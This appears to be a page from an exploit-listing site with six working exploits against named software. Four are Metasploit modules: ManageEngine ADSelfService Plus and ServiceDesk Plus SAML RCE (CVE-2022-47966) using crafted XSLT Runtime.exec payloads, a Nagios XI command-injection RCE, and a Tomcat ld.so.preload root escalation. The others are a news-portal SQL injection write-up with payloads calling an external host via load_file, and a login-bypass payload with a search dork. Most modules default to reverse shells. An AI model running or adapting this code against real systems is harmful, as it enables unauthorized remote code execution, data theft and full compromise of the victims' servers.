Latest exploits :: CodePwn

<pre><code># This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'ManageEngine ADSelfService Plus Unauthenticated SAML RCE', 'Description' => %q{ This exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine AdSelfService Plus versions 6210 and below (CVE-2022-47966). Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted `samlResponse` XML to the ADSelfService Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status. }, 'Author' => [ 'Khoa Dinh', # Original research 'horizon3ai', # PoC 'Christophe De La Fuente' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-47966'], ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'], ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'], ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'], ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis'] ], 'Platform' => ['win'], 'Payload' => { 'BadChars' => "\x27" }, 'Targets' => [ [ 'Windows EXE Dropper', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper, 'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' } } ], [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' } } ] ], 'DefaultOptions' => { 'RPORT' => 9251, 'SSL' => true }, 'DefaultTarget' => 1, 'DisclosureDate' => '2023-01-10', 'Notes' => { 'Stability' => [CRASH_SAFE,], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] }, 'Privileged' => true ) ) register_options([ OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/samlLogin' ]), OptString.new('GUID', [ true, 'The SAML endpoint GUID' ]), OptString.new('ISSUER_URL', [ true, 'The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server' ]), OptString.new('RELAY_STATE', [ false, 'The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"' ]) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI'], datastore['GUID']) ) return CheckCode::Unknown unless res return CheckCode::Safe unless res.code == 200 product = res.get_html_document.xpath('//title').first&.text unless product == 'ADSelfService Plus' return CheckCode::Safe("This is not ManageEngine ADSelfService Plus (#{product})") end CheckCode::Detected end def encode_begin(real_payload, reqs) super reqs['EncapsulationRoutine'] = proc do |_reqs, raw| raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw end end def exploit case target['Type'] when :windows_command execute_command(payload.encoded) when :windows_dropper execute_cmdstager end end def execute_command(cmd, _opts = {}) if target['Type'] == :windows_dropper cmd = "cmd /c #{cmd}" end cmd = cmd.encode(xml: :attr).gsub('"', '') assertion_id = "_#{SecureRandom.uuid}" # Randomize variable names and make sure they are all different using a Set vars = Set.new loop do vars << Rex::Text.rand_text_alpha_lower(5..8) break unless vars.size < 3 end vars = vars.to_a saml = <<~EOS <?xml version="1.0" encoding="UTF-8"?> <samlp:Response ID="_#{SecureRandom.uuid}" InResponseTo="_#{Rex::Text.rand_text_hex(32)}" IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <Assertion ID="#{assertion_id}" IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"> <Issuer>#{datastore['ISSUER_URL']}</Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="##{assertion_id}"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> <xsl:stylesheet version="1.0" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/> <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/> <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/> <xsl:value-of select="$#{vars[2]}"/> </xsl:template> </xsl:stylesheet> </ds:Transform> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(rand(128..256)))}</ds:SignatureValue> <ds:KeyInfo/> </ds:Signature> </Assertion> </samlp:Response> EOS relay_state_url = datastore['RELAY_STATE'] if relay_state_url.blank? relay_state_url = "http#{'s' if datastore['SSL']}://#{rhost}:#{rport}/samlLogin/LoginAuth" end res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI'], datastore['GUID']), 'vars_get' => { 'RelayState' => Rex::Text.encode_base64(relay_state_url) }, 'vars_post' => { 'SAMLResponse' => Rex::Text.encode_base64(saml) } }) unless res&.code == 200 fail_with(Failure::Unknown, "Unknown error returned (HTTP code: #{res&.code})") end res end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::NagiosXi include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection', 'Description' => %q{ This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matthew Mathur' ], 'References' => [ ['CVE', '2021-25296'], ['CVE', '2021-25297'], ['CVE', '2021-25298'], ['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md'] ], 'Platform' => %w[linux unix], 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ], 'Targets' => [ [ 'Linux (x86)', { 'Arch' => [ ARCH_X86 ], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' } } ], [ 'Linux (x64)', { 'Arch' => [ ARCH_X64 ], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], [ 'CMD', { 'Arch' => [ ARCH_CMD ], 'Platform' => 'unix', # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' } } ] ], 'Privileged' => false, 'DefaultTarget' => 2, 'DisclosureDate' => '2021-02-13', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296']) ] end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def finish_install datastore['FINISH_INSTALL'] end # Returns a status code an a error message on failure. # On success returns the status code and an array so we # can update the login_result and res_array variables appropriately. def handle_unsigned_license(res_array, username, password, finish_install) auth_cookies, nsp = res_array sign_license_result = sign_license_agreement(auth_cookies, nsp) if sign_license_result return 5, 'Failed to sign license agreement' end print_status('License agreement signed. The module will wait for 5 seconds and retry the login.') sleep 5 login_result, res_array = login_after_install_or_license(username, password, finish_install) case login_result when 1..4 # An error occurred, propagate the error message return login_result, res_array[0] when 5 # The Nagios XI license agreement still has not been signed return 5, 'Failed to sign the license agreement.' end return login_result, res_array end def authenticate # Use nagios_xi_login to try and authenticate. login_result, res_array = nagios_xi_login(username, password, finish_install) case login_result when 1..3 # An error occurred, propagate the error message return login_result, res_array[0] when 4 # Nagios XI is not fully installed install_result = install_nagios_xi(password) if install_result # On installation failure, result is an array with the code and error message return install_result[0], install_result[1] end login_result, res_array = login_after_install_or_license(username, password, finish_install) case login_result when 1..4 # An error occurred, propagate the error message return login_result, res_array[0] when 5 # The license agreement still needs to be signed login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install) return login_result, res_array unless (login_result == 0) end when 5 # The license agreement still needs to be signed login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install) return login_result, res_array unless (login_result == 0) end print_good('Successfully authenticated to Nagios XI.') # Extract the authenticated cookies and nsp to use throughout the module if res_array.length == 2 auth_cookies = res_array[1] if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies) @auth_cookies = auth_cookies else return login_result, 'Failed to extract authentication cookies' end nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/) if nsp @nsp = nsp[1] else return login_result, 'Failed to extract nsp string' end else return login_result, 'Failed to extract auth cookies and nsp string' end # Set the version here so both check and exploit can use it nagios_version = nagios_xi_version(res_array[0]) if nagios_version.nil? return 6, 'Unable to obtain the Nagios XI version from the dashboard' end print_status("Target is Nagios XI with version #{nagios_version}.") # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle, # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions. if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0' nagios_version = '1.0.0' end @version = Rex::Version.new(nagios_version) return 0, 'Successfully authenticated and retrieved NagiosXI Version.' end def check # Authenticate to ensure we can access the NagiosXI version auth_result, err_msg = authenticate case auth_result when 1 return CheckCode::Unknown(err_msg) when 2, 4, 5, 6 return CheckCode::Detected(err_msg) when 3 return CheckCode::Safe(err_msg) end if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5') return CheckCode::Appears end return CheckCode::Safe end def execute_command(cmd, _opts = {}) if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check auth_result, err_msg = authenticate case auth_result when 1 fail_with(Failure::Disconnected, err_msg) when 2, 4, 5, 6 fail_with(Failure::UnexpectedReply, err_msg) when 3 fail_with(Failure::NotVulnerable, err_msg) end end # execute payload based on the selected targeted configuration wizard url_params = { 'update' => 1, 'nsp' => @nsp } # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298 # changes from address to ip_address if @version <= Rex::Version.new('5.5.7') address_param = 'address' else address_param = 'ip_address' end # CVE-2021-25296 affects the windowswmi configuration wizard. if datastore['TARGET_CVE'] == 'CVE-2021-25296' url_params = url_params.merge({ 'nextstep' => 3, 'wizard' => 'windowswmi', 'ip_address' => Array.new(4) { rand(256) }.join('.'), 'domain' => Rex::Text.rand_text_alphanumeric(7..15), 'username' => Rex::Text.rand_text_alphanumeric(7..20), 'password' => Rex::Text.rand_text_alphanumeric(7..20), 'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};" }) # CVE-2021-25297 affects the switch configuration wizard. elsif datastore['TARGET_CVE'] == 'CVE-2021-25297' url_params = url_params.merge({ 'nextstep' => 3, 'wizard' => 'switch', address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};", 'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15), 'scaninterfaces' => 'on' }) # CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by # specifying the digitalocean option for the wizard parameter. elsif datastore['TARGET_CVE'] == 'CVE-2021-25298' url_params = url_params.merge({ address_param => Array.new(4) { rand(256) }.join('.') + "; #{cmd};", 'nextstep' => 4, 'wizard' => 'digitalocean' }) else fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.') end print_status('Sending the payload...') # Send the final request. Note that the target is not expected to respond if we get # code execution. Therefore, we set the timeout on this request to 0. send_request_cgi({ 'method' => 'GET', 'uri' => '/nagiosxi/config/monitoringwizard.php', 'cookie' => @auth_cookies, 'vars_get' => url_params }) end def exploit if target.arch.first == ARCH_CMD execute_command(payload.encoded) else execute_cmdstager(background: true) end end end </code></pre>

<pre><code># This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'ManageEngine ServiceDesk Plus Unauthenticated SAML RCE', 'Description' => %q{ This exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (CVE-2022-47966). Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted `samlResponse` XML to the ServiceDesk Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status. }, 'Author' => [ 'Khoa Dinh', # Original research 'horizon3ai', # PoC 'Christophe De La Fuente' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-47966'], ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'], ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'], ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'], ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis'] ], 'Platform' => ['win', 'unix', 'linux'], 'Payload' => { 'BadChars' => "\x27" }, 'Targets' => [ [ 'Windows EXE Dropper', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper, 'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' } } ], [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' } } ], [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }, 'CmdStagerFlavor' => %w[curl wget echo lwprequest] } ] ], 'DefaultOptions' => { 'RPORT' => 8080 }, 'DefaultTarget' => 1, 'DisclosureDate' => '2023-01-10', 'Notes' => { 'Stability' => [CRASH_SAFE,], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] }, 'Privileged' => true ) ) register_options([ OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/SamlResponseServlet' ]), OptInt.new('DELAY', [ true, 'Number of seconds to wait between each request', 5 ]) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI']) ) return CheckCode::Unknown unless res # vulnerable servers respond with 400 and a HTML body return CheckCode::Safe unless res.code == 400 script = res.get_html_document.xpath('//script[contains(text(), "BUILD_NUMBER")]') info = script.text.match(/PRODUCT_NAME\\x22\\x3A\\x22(?<product>.+?)\\x22,.*BUILD_NUMBER\\x22\\x3A\\x22(?<build>[0-9]+?)\\x22,/) return CheckCode::Unknown unless info unless info[:product] == 'ManageEngine\\x20ServiceDesk\\x20Plus' return CheckCode::Safe("This is not ManageEngine ServiceDesk Plus (#{info[:product]})") end # SAML 2.0 support has been added in build 10511 # see https://www.manageengine.com/products/service-desk/on-premises/readme.html#readme105 build = Rex::Version.new(info[:build]) unless build >= Rex::Version.new('10511') && build <= Rex::Version.new('14003') return CheckCode::Safe("Target build is #{info[:build]}") end CheckCode::Appears end def encode_begin(real_payload, reqs) super reqs['EncapsulationRoutine'] = proc do |_reqs, raw| raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw end end def exploit case target['Type'] when :windows_command, :unix_cmd execute_command(payload.encoded) when :windows_dropper, :linux_dropper execute_cmdstager(delay: datastore['DELAY']) end end def execute_command(cmd, _opts = {}) case target['Type'] when :windows_dropper cmd = "cmd /c #{cmd}" when :unix_cmd, :linux_dropper cmd = cmd.gsub(' ') { '${IFS}' } cmd = "bash -c #{cmd}" end cmd = cmd.encode(xml: :attr).gsub('"', '') assertion_id = "_#{SecureRandom.uuid}" # Randomize variable names and make sure they are all different using a Set vars = Set.new loop do vars << Rex::Text.rand_text_alpha_lower(5..8) break unless vars.size < 3 end vars = vars.to_a saml = <<~EOS <?xml version="1.0" encoding="UTF-8"?> <samlp:Response ID="_#{SecureRandom.uuid}" InResponseTo="_#{Rex::Text.rand_text_hex(32)}" IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <Assertion ID="#{assertion_id}" IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"> <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="##{assertion_id}"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> <xsl:stylesheet version="1.0" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/> <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/> <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/> <xsl:value-of select="$#{vars[2]}"/> </xsl:template> </xsl:stylesheet> </ds:Transform> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(rand(128..256)))}</ds:SignatureValue> <ds:KeyInfo/> </ds:Signature> </Assertion> </samlp:Response> EOS res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI']), 'vars_post' => { 'SAMLResponse' => Rex::Text.encode_base64(saml) } }) unless res&.code == 500 lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip) unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') } elog("Unkown error returned:\n#{lines.join("\n")}") fail_with(Failure::Unknown, "Unknown error returned (HTTP code: #{res&.code}). See logs for details.") end fail_with(Failure::NoAccess, 'Maximum access limit exceeded (wait at least 1 minute and increase the DELAY option value)') end res end end </code></pre>

<pre><code>## Title: 101news-by-Mayuri-K-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 02.02.2023 ## Vendor: https://mayurik.com/ ## Software: https://mayurik.com/source-code/P4030/news-portal-project-in-php ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `comment` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+' was submitted in the comment parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. This system is absolutely UNPROTECTED! STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: comment (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'' RLIKE (SELECT (CASE WHEN (1140=1140) THEN 0x313637353635+(select load_file(0x5c5c5c5c316b6d376233693432716b70346d3269793572797068696f62666838357a796e7071646930626f302e6f6173746966792e636f6d5c5c627866))+'' ELSE 0x28 END)) AND 'RBgF'='RBgF&submit= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'' AND (SELECT 4135 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(4135=4135,1))),0x7171627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iMBs'='iMBs&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select load_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'' AND (SELECT 1879 FROM (SELECT(SLEEP(3)))AQLB) AND 'asLq'='asLq&submit= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/101news) ## Proof and Exploit: [href](https://streamable.com/vrc7x8) ## Time spend: 01:00:00 </code></pre>

<pre><code>==================================================================================================================================== | # Title : Material Dashboard 2 Auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://www.creative-tim.com/ | | # Dork : "Material Dashboard 2 by Creative Tim" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] Use Payload = user : 'or''='@gmail.com & pass : 'or''=' [+] http://127.0.0.1/kacatalystcom/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | ======================================================================================================================================= </code></pre>

<pre><code>### # # This exploit sample shows how an exploit module could be written to exploit # a bug in a command on a linux computer for priv esc. # ### class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Exploit::Retry include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::Linux::Compile prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Apache Tomcat on Ubuntu Log Init Privilege Escalation', 'Description' => %q{ Tomcat (6, 7, 8) packages provided by default repositories on Debian-based distributions (including Debian, Ubuntu etc.) provide a vulnerable tomcat init script that allows local attackers who have already gained access to the tomcat account (for example, by exploiting an RCE vulnerability in a java web application hosted on Tomcat, uploading a webshell etc.) to escalate their privileges from tomcat user to root and fully compromise the target system. Tested against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04 }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Dawid Golunski <dawid@legalhackers.com>' # original PoC, analysis, discovery ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_PYTHON ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 1800 # 30min }, 'References' => [ [ 'EDB', '40450' ], [ 'URL', 'https://ubuntu.com/security/notices/USN-3081-1'], [ 'URL', 'http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html'], [ 'CVE', '2016-1240'] ], 'DisclosureDate' => '2016-09-30', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS] } ) ) register_options [ OptString.new('CATALINA', [ true, 'Location of catalina.out file', '/var/log/tomcat8/catalina.out' ]) ] register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), ] end def base_dir datastore['WritableDir'].to_s end def preload '/etc/ld.so.preload' end def catalina datastore['CATALINA'] end def check package = cmd_exec('dpkg -l tomcat[6-8] | grep \'^i\'') if package.nil? || package.empty? return CheckCode::Safe('Unable to execute command to determine installed pacakges') end package = package.gsub('\s+', ' ') # replace whitespace with space so we can split easy package = package.split(' ') # 0 is ii for installed # 1 is tomcat# for package name # 2 is version number package = Rex::Version.new(package[2]) if (package.to_s.start_with?('8') && package < Rex::Version.new('8.0.32-1ubuntu1.2')) || (package.to_s.start_with?('7') && package < Rex::Version.new('7.0.52-1ubuntu0.7')) || (package.to_s.start_with?('6') && package < Rex::Version.new('6.0.35-1ubuntu3.8')) return CheckCode::Appears("Vulnerable app version detected: #{package}") end CheckCode::Safe("Unexploitable tomcat packages found: #{package}") end def exploit # Check if we're already root if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end unless file? catalina fail_with Failure::BadConfig, "#{catalina} not found or still symlinked" end if file? preload fail_with Failure::BadConfig, "#{preload} found, check file as it needs to be removed for exploitation" end vprint_status("Creating backup of #{catalina}") @catalina_content = read_file(catalina) path = store_loot( catalina, 'text/plain', rhost, @catalina_content, 'catalina.out' ) print_good("Original #{catalina} backed up to #{path}") if live_compile? # upload our privesc stub so_stub = ".#{rand_text_alphanumeric(5..10)}.so" so_stub_path = "#{base_dir}/#{so_stub}" payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" # Upload exploit stub vprint_status "Compiling exploit stub: #{so_stub_path}" upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl' else payload_path = '/tmp/.jMeY5vToQl' so_stub = '.ny9NyKEPJ.so' so_stub_path = "/tmp/#{so_stub}" write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so')) end register_file_for_cleanup(so_stub_path) # Upload payload executable vprint_status("Uploading Payload to #{payload_path}") upload_and_chmodx payload_path, generate_payload_exe register_file_for_cleanup(payload_path) # delete the log and symlink ld.so.preload vprint_status("Deleting #{catalina}") rm_f(catalina) vprint_status("Creating symlink from #{preload} to #{catalina}") cmd_exec("ln -s #{preload} #{catalina}") register_file_for_cleanup(catalina) # we now need tomcat to restart print_good("Waiting #{datastore['WfsDelay']} seconds on tomcat to re-open the logs aka a Tomcat service restart") succeeded = retry_until_truthy(timeout: datastore['WfsDelay']) do file? preload end unless succeeded print_error("#{preload} not found, exploit aborted") return end register_file_for_cleanup(preload) # now that we can write to ld.so.preload, use a SUID binary to execute our stub print_status("injecting #{so_stub_path} into #{preload}") cmd_exec "echo #{so_stub_path} > #{preload}" print_status('Escalating payload privileges via SUID binary (sudo)') cmd_exec 'sudo --help 2>/dev/null >/dev/null' print_status('Executing payload') cmd_exec payload_path end def cleanup if @catalina_content.nil? cmd_exec("touch #{catalina}") else write_file(catalina, @catalina_content) end super end end </code></pre>

